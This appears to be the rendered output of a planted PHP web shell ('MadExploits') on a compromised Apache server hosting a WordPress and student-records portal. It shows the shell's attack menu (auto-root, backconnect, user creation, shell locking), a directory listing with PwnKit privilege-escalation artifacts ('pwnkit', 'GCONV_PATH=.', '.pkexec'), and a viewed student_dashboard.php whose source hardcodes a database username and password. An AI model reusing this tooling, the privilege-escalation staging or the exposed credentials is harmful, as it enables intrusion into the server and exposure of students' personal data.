Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cipd /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
applications
[ DIR ]
drwxr-xr-x
upload
[ DIR ]
drwxrwxrwx
wp-admin
[ DIR ]
drwxrwxr-x
wp-content
[ DIR ]
drwxrwxr-x
wp-includes
[ DIR ]
drwxrwxr-x
.htaccess
523
B
-rwxrwxr-x
.mad-root
0
B
-rw-r--r--
admin_dashboard.php
20.42
KB
-rw-r--r--
admin_login.php
8.62
KB
-rw-r--r--
index.php
405
B
-rwxrwxr-x
license.txt
19.45
KB
-rwxrwxr-x
old-data.tar
381.81
MB
-rwxrwxr-x
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.23
KB
-rwxrwxr-x
student_dashboard.php
24.53
KB
-rw-r--r--
student_form.php
15.23
KB
-rw-r--r--
student_login.php
7.94
KB
-rw-r--r--
student_ranking.php
17.12
KB
-rw-r--r--
wordpress-6.5.5.zip
24.98
MB
-rwxrwxr-x
wp-activate.php
7.21
KB
-rwxrwxr-x
wp-blog-header.php
351
B
-rwxrwxr-x
wp-comments-post.php
2.27
KB
-rwxrwxr-x
wp-config
3.12
KB
-rwxrwxr-x
wp-config-sample.php
2.94
KB
-rwxrwxr-x
wp-config.php
3.21
KB
-rw-rw-rw-
wp-cron.php
5.51
KB
-rwxrwxr-x
wp-links-opml.php
2.44
KB
-rwxrwxr-x
wp-load.php
3.83
KB
-rwxrwxr-x
wp-login.php
49.72
KB
-rwxrwxr-x
wp-mail.php
8.33
KB
-rwxrwxr-x
wp-settings.php
27.76
KB
-rwxrwxr-x
wp-signup.php
33.58
KB
-rwxrwxr-x
wp-trackback.php
4.77
KB
-rwxrwxr-x
xmlrpc.php
3.17
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : student_dashboard.php
<?php // student_dashboard.php // Student dashboard: add record (likes, photo, source), view history, delete record with modal confirmation session_start(); mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT); // require login if (empty($_SESSION['user_id'])) { header('Location: student_login.php'); exit; } $errors = []; $success_msg = null; $allowed_sources = ["linkedin", "instagram", "facebook", "twitter"]; $upload_dir = __DIR__ . '/upload/'; // ensure writable $max_size = 5 * 1024 * 1024; // 5MB try { $conn = new mysqli("localhost", "cipd", "CiPd-CiPd2024", "cipd"); // $conn = new mysqli("localhost", "root", "", "student_db"); $conn->set_charset("utf8mb4"); $user_id = (int) $_SESSION['user_id']; // Logout handler (GET) if (isset($_GET['action']) && $_GET['action'] === 'logout') { $_SESSION = []; if (ini_get("session.use_cookies")) { $params = session_get_cookie_params(); setcookie(session_name(), '', time() - 42000, $params["path"], $params["domain"], $params["secure"], $params["httponly"] ); } session_destroy(); header('Location: student_login.php'); exit; } // Fetch basic user info from users table for display $stmt = $conn->prepare("SELECT id, name, email, phone, branch, year FROM users WHERE id = ? LIMIT 1"); $stmt->bind_param("i", $user_id); $stmt->execute(); $res = $stmt->get_result(); $user = $res->fetch_assoc(); $stmt->close(); if (!$user) { throw new Exception("User not found."); } // Handle POST actions if ($_SERVER['REQUEST_METHOD'] === 'POST') { $action = $_POST['action'] ?? ''; // === Add record === if ($action === 'add_record') { // collect and trim $likes_raw = trim($_POST['likes'] ?? ''); $source = trim($_POST['source'] ?? ''); // server-side validations if ($likes_raw === '' || !preg_match('/^[0-9]+$/', $likes_raw)) { $errors[] = "Likes must be a non-negative integer (use 0 if none)."; } else { $likes = (int) $likes_raw; if ($likes < 0) $errors[] = "Likes cannot be negative."; } if ($source === '' || !in_array($source, $allowed_sources, true)) { $errors[] = "Please select a valid source."; } // handle photo upload (optional) $photo_url = null; if (isset($_FILES['photo']) && $_FILES['photo']['error'] !== UPLOAD_ERR_NO_FILE) { $file = $_FILES['photo']; if ($file['error'] !== UPLOAD_ERR_OK) { $errors[] = "Error uploading file (code {$file['error']})."; } else { $finfo = finfo_open(FILEINFO_MIME_TYPE); $mime = finfo_file($finfo, $file['tmp_name']); finfo_close($finfo); $allowed_mimes = [ 'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif' ]; $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION)); if (!array_key_exists($ext, $allowed_mimes)) { $errors[] = "Allowed file formats: JPG, PNG, GIF."; } elseif ($mime !== $allowed_mimes[$ext] && strpos($mime, 'image/') !== 0) { $errors[] = "File type mismatch detected."; } elseif ($file['size'] > $max_size) { $errors[] = "File exceeds maximum size of 5MB."; } else { // ensure upload dir exists if (!is_dir($upload_dir)) { if (!mkdir($upload_dir, 0755, true)) { $errors[] = "Failed to create upload directory on server."; } } if (empty($errors)) { $random = bin2hex(random_bytes(8)); $safe_name = time() . "_" . $random . "." . $ext; $target = $upload_dir . $safe_name; if (!move_uploaded_file($file['tmp_name'], $target)) { $errors[] = "Failed to move uploaded file."; } else { // store relative path $photo_url = 'upload/' . $safe_name; } } } } } // Insert new record if no errors if (empty($errors)) { if ($photo_url !== null) { $stmt = $conn->prepare("INSERT INTO student_records (user_id, likes, photo_url, source) VALUES (?, ?, ?, ?)"); $stmt->bind_param("iiss", $user_id, $likes, $photo_url, $source); } else { $stmt = $conn->prepare("INSERT INTO student_records (user_id, likes, source) VALUES (?, ?, ?)"); $stmt->bind_param("iis", $user_id, $likes, $source); } if (!$stmt->execute()) { throw new Exception("Failed to add record: " . $stmt->error); } $stmt->close(); // redirect to avoid repost + show newly added history header("Location: " . $_SERVER['PHP_SELF']); exit; } } // === Delete record === if ($action === 'delete_record') { $record_id = isset($_POST['record_id']) ? (int) $_POST['record_id'] : 0; if ($record_id <= 0) { $errors[] = "Invalid record id."; } else { // Verify record belongs to this user and fetch photo_url if any $stmt = $conn->prepare("SELECT photo_url FROM student_records WHERE id = ? AND user_id = ? LIMIT 1"); $stmt->bind_param("ii", $record_id, $user_id); $stmt->execute(); $res = $stmt->get_result(); $r = $res->fetch_assoc(); $stmt->close(); if (!$r) { $errors[] = "Record not found or access denied."; } else { $photo_to_delete = $r['photo_url'] ?? null; // Delete row $stmt = $conn->prepare("DELETE FROM student_records WHERE id = ? AND user_id = ?"); $stmt->bind_param("ii", $record_id, $user_id); if (!$stmt->execute()) { throw new Exception("Failed to delete record: " . $stmt->error); } $stmt->close(); // remove file if exists if (!empty($photo_to_delete)) { $candidate = __DIR__ . '/' . $photo_to_delete; if (file_exists($candidate) && is_file($candidate)) { @unlink($candidate); } } // success - redirect to clear POST header("Location: " . $_SERVER['PHP_SELF']); exit; } } } } // Fetch all records (history) for this user $stmt = $conn->prepare("SELECT id, likes, photo_url, source, is_ranked, created_at FROM student_records WHERE user_id = ? ORDER BY created_at DESC"); $stmt->bind_param("i", $user_id); $stmt->execute(); $res = $stmt->get_result(); $records = $res->fetch_all(MYSQLI_ASSOC); $stmt->close(); // Format created_at timestamps to dd/mm/yy hh:mm am/pm foreach ($records as $k => $row) { $fmt = ''; if (!empty($row['created_at'])) { try { $dt = new DateTime($row['created_at']); // format: day/month/two-digit-year 12-hour:minute am/pm $fmt = $dt->format('d/m/y h:i a'); // e.g. 17/11/25 04:52 pm } catch (Exception $e) { $fmt = $row['created_at']; } } $records[$k]['created_at_fmt'] = $fmt; } } catch (Exception $e) { $errors[] = $e->getMessage(); } finally { if (isset($conn) && $conn instanceof mysqli) $conn->close(); } ?> <!doctype html> <html lang="en"> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width,initial-scale=1" /> <title>Student Dashboard</title> <style> :root{ --bg:#f6f9fc; --card:#fff; --muted:#6b7280; --accent:#0b69ff; --danger:#dc2626; --radius:12px; --input-border:#e6e9ef; } *{box-sizing:border-box} body{margin:0;font-family:Inter, system-ui, -apple-system, "Segoe UI", Roboto, Arial;background:var(--bg);color:#0f172a;padding:30px;display:flex;justify-content:center;min-height:100vh} .container{width:100%;max-width:1100px} .header{display:flex;align-items:center;justify-content:space-between;margin-bottom:18px} .h-title{font-size:20px;font-weight:700} .card{background:var(--card);border-radius:var(--radius);box-shadow:0 12px 30px rgba(2,6,23,0.06);padding:20px;display:grid;grid-template-columns:300px 1fr;gap:24px} @media(max-width:980px){.card{grid-template-columns:1fr}} .profile-box{text-align:center;padding:10px} .avatar{width:160px;height:160px;border-radius:12px;object-fit:cover;border:1px solid var(--input-border);background:#f8fafc} .field{margin-bottom:12px} .label{font-size:13px;color:var(--muted);margin-bottom:6px;font-weight:600} .value{font-size:15px;color:#0f172a} .form{padding:4px 6px} .input, select{width:100%;padding:10px 12px;border-radius:8px;border:1px solid var(--input-border);font-size:14px;margin-bottom:10px} .btn{background:var(--accent);color:#fff;padding:10px 14px;border-radius:10px;border:none;font-weight:700;cursor:pointer} .btn.ghost{background:#fff;color:var(--accent);border:1px solid rgba(11,105,255,0.08)} .alert{background:#fff4f4;border:1px solid #ffd7d7;padding:10px;border-radius:8px;color:var(--danger);margin-bottom:12px} .success{background:#f0fdf4;border:1px solid #bbf7d0;padding:10px;border-radius:8px;color:#166534;margin-bottom:12px} .helper{font-size:13px;color:var(--muted)} .logout{background:#fff;color:var(--danger);border:1px solid rgba(220,38,38,0.08);padding:8px 10px;border-radius:8px;text-decoration:none} .small{font-size:13px;color:var(--muted)} /* history list */ .history { display:flex;flex-direction:column;gap:12px; } .record { display:flex; gap:12px; align-items:center; padding:12px; border-radius:10px; background:#fbfdff; border:1px solid #eef2f6; } .record-thumb { width:72px; height:72px; border-radius:8px; object-fit:cover; background:#f4f7fb; display:flex;align-items:center;justify-content:center; color:var(--muted); font-weight:700; font-size:18px; } .record-meta { flex:1; } .record-meta .row { display:flex; justify-content:space-between; gap:12px; align-items:center; } .record-meta .small { color:var(--muted); font-size:13px; } .record-actions { display:flex; gap:8px; align-items:center; } /* add record button area */ .add-area { display:flex; gap:12px; align-items:center; justify-content:space-between; margin-bottom:14px; } @media(max-width:600px){ .add-area { flex-direction:column; align-items:stretch; } .record-meta .row { flex-direction:column; align-items:flex-start; gap:6px } .record { flex-direction:column; align-items:flex-start } .record-thumb { width:100%; height:140px } } /* small delete button */ .delete-btn { background:transparent; border:1px solid rgba(220,38,38,0.12); color:var(--danger); padding:6px 8px; border-radius:8px; cursor:pointer; font-weight:600; } .delete-btn:hover { background:rgba(220,38,38,0.04); } /* modal */ .modal-backdrop { position:fixed;inset:0;background:rgba(2,6,23,0.45);display:none;align-items:center;justify-content:center;padding:20px;z-index:9999; } .modal { width:100%;max-width:520px;background:white;border-radius:12px;padding:20px;box-shadow:0 14px 40px rgba(2,6,23,0.2); } .modal h3{margin:0 0 8px 0;font-size:18px} .modal p{margin:0 0 14px 0;color:var(--muted)} .modal .actions{display:flex;gap:10px;justify-content:flex-end} .btn-danger{background:var(--danger);color:white;padding:10px 14px;border-radius:10px;border:none;cursor:pointer;font-weight:700} .btn-cancel{background:#f3f4f6;color:#111;padding:10px 14px;border-radius:10px;border:none;cursor:pointer} </style> </head> <body> <div class="container"> <div class="header"> <div class="h-title">Student Dashboard</div> <div> <span class="small">Welcome, <?php echo htmlspecialchars($user['name']); ?></span> • <a class="logout" href="?action=logout" >Logout</a> </div> </div> <div class="card" role="region" aria-label="Student dashboard"> <div class="profile-box"> <?php // show most recent photo from records if available, else initial $display_photo = ''; if (!empty($records) && !empty($records[0]['photo_url'])) { $candidate = __DIR__ . '/' . $records[0]['photo_url']; if (file_exists($candidate)) $display_photo = $records[0]['photo_url']; } ?> <?php if ($display_photo !== ''): ?> <img src="<?php echo htmlspecialchars($display_photo); ?>" alt="Profile photo" class="avatar"> <?php else: ?> <div class="avatar" style="display:flex;align-items:center;justify-content:center;font-size:40px;"> <?php echo htmlspecialchars(mb_substr($user['name'], 0, 1)); ?> </div> <?php endif; ?> <div class="field" style="margin-top:12px"> <div class="label">Name</div> <div class="value"><?php echo htmlspecialchars($user['name']); ?></div> </div> <div class="field"> <div class="label">Email</div> <div class="value"><?php echo htmlspecialchars($user['email']); ?></div> </div> <div class="field"> <div class="label">Phone</div> <div class="value"><?php echo htmlspecialchars($user['phone']); ?></div> </div> <div class="field"> <div class="label">Branch / Year</div> <div class="value"><?php echo htmlspecialchars($user['branch']) . ' • ' . htmlspecialchars($user['year']); ?></div> </div> </div> <div> <?php if (!empty($errors)): ?> <div class="alert" role="alert"> <ul style="margin:0 0 0 18px"> <?php foreach ($errors as $err): ?> <li><?php echo htmlspecialchars($err); ?></li> <?php endforeach; ?> </ul> </div> <?php endif; ?> <?php if (!empty($success_msg)): ?> <div class="success"><?php echo htmlspecialchars($success_msg); ?></div> <?php endif; ?> <!-- Add record form --> <div class="add-area"> <div style="flex:1"> <form id="addRecordForm" method="POST" enctype="multipart/form-data" novalidate> <input type="hidden" name="action" value="add_record"> <div style="display:grid;grid-template-columns:1fr 160px;gap:10px;align-items:end"> <div> <label class="label" for="likes">Likes</label> <input id="likes" name="likes" class="input" type="number" min="0" step="1" placeholder="e.g. 42" required> </div> <div> <label class="label" for="source">Source</label> <select id="source" name="source" class="input" required> <option value="">Select Source</option> <?php foreach ($allowed_sources as $s): ?> <option value="<?php echo htmlspecialchars($s); ?>"><?php echo htmlspecialchars(ucfirst($s)); ?></option> <?php endforeach; ?> </select> </div> </div> <div style="display:flex;gap:10px;margin-top:10px;align-items:center"> <div style="flex:1"> <label class="label" for="photo">Photo (optional)</label> <input id="photo" name="photo" class="input" type="file" accept="image/*"> </div> <div style="display:flex;flex-direction:column;gap:8px"> <button type="submit" class="btn">Add Record</button> </div> </div> </form> </div> </div> <!-- History list --> <h3 style="margin:10px 0 12px 0">History</h3> <div class="history" id="historyList"> <?php if (empty($records)): ?> <div class="small" style="color:var(--muted)">No records yet. Use "Add Record" to create the first entry.</div> <?php else: ?> <?php foreach ($records as $r): ?> <div class="record" id="record-<?php echo (int)$r['id']; ?>"> <?php $thumb = ''; if (!empty($r['photo_url'])) { $candidate = __DIR__ . '/' . $r['photo_url']; if (file_exists($candidate)) $thumb = $r['photo_url']; } ?> <div class="record-thumb"> <?php if ($thumb !== ''): ?> <img src="<?php echo htmlspecialchars($thumb); ?>" alt="photo" style="width:100%;height:100%;border-radius:8px;object-fit:cover"> <?php else: ?> <?php echo htmlspecialchars(mb_substr($user['name'],0,1)); ?> <?php endif; ?> </div> <div class="record-meta"> <div class="row"> <div> <div style="font-weight:700"><?php echo htmlspecialchars($r['likes']); ?> likes</div> <div class="small"><?php echo htmlspecialchars(ucfirst($r['source'])); ?></div> </div> <div class="small"><?php echo htmlspecialchars($r['created_at_fmt'] ?? $r['created_at']); ?></div> </div> </div> <div class="record-actions"> <?php if (!empty($r['is_ranked'])): ?> <span style="background:#eefaf0;color:#166534;padding:6px 8px;border-radius:6px;font-weight:600;font-size:13px">Ranked</span> <?php endif; ?> <!-- Delete button: opens modal --> <button class="delete-btn" data-record-id="<?php echo (int)$r['id']; ?>" aria-label="Delete record <?php echo (int)$r['id']; ?>">Delete</button> </div> </div> <?php endforeach; ?> <?php endif; ?> </div> </div> </div> </div> <!-- Hidden delete form (submitted by modal confirm) --> <form id="deleteForm" method="POST" style="display:none;"> <input type="hidden" name="action" value="delete_record"> <input type="hidden" name="record_id" id="deleteRecordId" value=""> </form> <!-- Modal markup --> <div id="modalBackdrop" class="modal-backdrop" role="dialog" aria-modal="true" aria-hidden="true" aria-labelledby="modalTitle"> <div class="modal" role="document"> <h3 id="modalTitle">Delete record</h3> <p id="modalDesc">Are you sure you want to delete this record? This action cannot be undone.</p> <div class="actions" style="margin-top:16px"> <button id="modalCancel" class="btn-cancel" type="button">Cancel</button> <button id="modalConfirm" class="btn-danger" type="button">Delete</button> </div> </div> </div> <script> (function(){ // Add record form validation const addForm = document.getElementById('addRecordForm'); const likes = document.getElementById('likes'); const source = document.getElementById('source'); const addSubmit = addForm.querySelector('button[type="submit"]'); function validateAdd() { const lv = likes.value.trim(); const sv = source ? source.value : ''; const ok = /^[0-9]+$/.test(lv) && sv !== ''; addSubmit.disabled = !ok; } likes.addEventListener('input', validateAdd); if (source) source.addEventListener('change', validateAdd); validateAdd(); addForm.addEventListener('submit', function(e){ const lv = likes.value.trim(); if (!/^[0-9]+$/.test(lv)) { e.preventDefault(); alert('Likes must be a non-negative integer.'); likes.focus(); return false; } if (source && source.value === '') { e.preventDefault(); alert('Please select a source.'); source.focus(); return false; } }); // Modal delete logic const modalBackdrop = document.getElementById('modalBackdrop'); const modalCancel = document.getElementById('modalCancel'); const modalConfirm = document.getElementById('modalConfirm'); const deleteForm = document.getElementById('deleteForm'); const deleteRecordIdInput = document.getElementById('deleteRecordId'); // Open modal when any delete button clicked document.querySelectorAll('.delete-btn').forEach(btn => { btn.addEventListener('click', function(e){ const rid = this.getAttribute('data-record-id'); if (!rid) return; deleteRecordIdInput.value = rid; openModal(); }); }); function openModal(){ modalBackdrop.style.display = 'flex'; modalBackdrop.setAttribute('aria-hidden', 'false'); // focus confirm button for accessibility modalConfirm.focus(); // trap focus simple: prevent tab from leaving (small helper) document.addEventListener('focus', trapFocus, true); } function closeModal(){ modalBackdrop.style.display = 'none'; modalBackdrop.setAttribute('aria-hidden', 'true'); deleteRecordIdInput.value = ''; document.removeEventListener('focus', trapFocus, true); } modalCancel.addEventListener('click', function(){ closeModal(); }); // Confirm -> submit hidden form modalConfirm.addEventListener('click', function(){ // submit delete form deleteForm.submit(); }); // Close modal on backdrop click (outside modal content) modalBackdrop.addEventListener('click', function(e){ if (e.target === modalBackdrop) closeModal(); }); // Close modal on Escape key window.addEventListener('keydown', function(e){ if (e.key === 'Escape' && modalBackdrop.style.display === 'flex') { closeModal(); } }); // Very small focus trap: keeps focus inside modal while open function trapFocus(event){ if (modalBackdrop.style.display !== 'flex') return; const modal = modalBackdrop.querySelector('.modal'); if (!modal.contains(event.target)) { event.stopPropagation(); modalConfirm.focus(); } } })(); </script> </body> </html>
Close
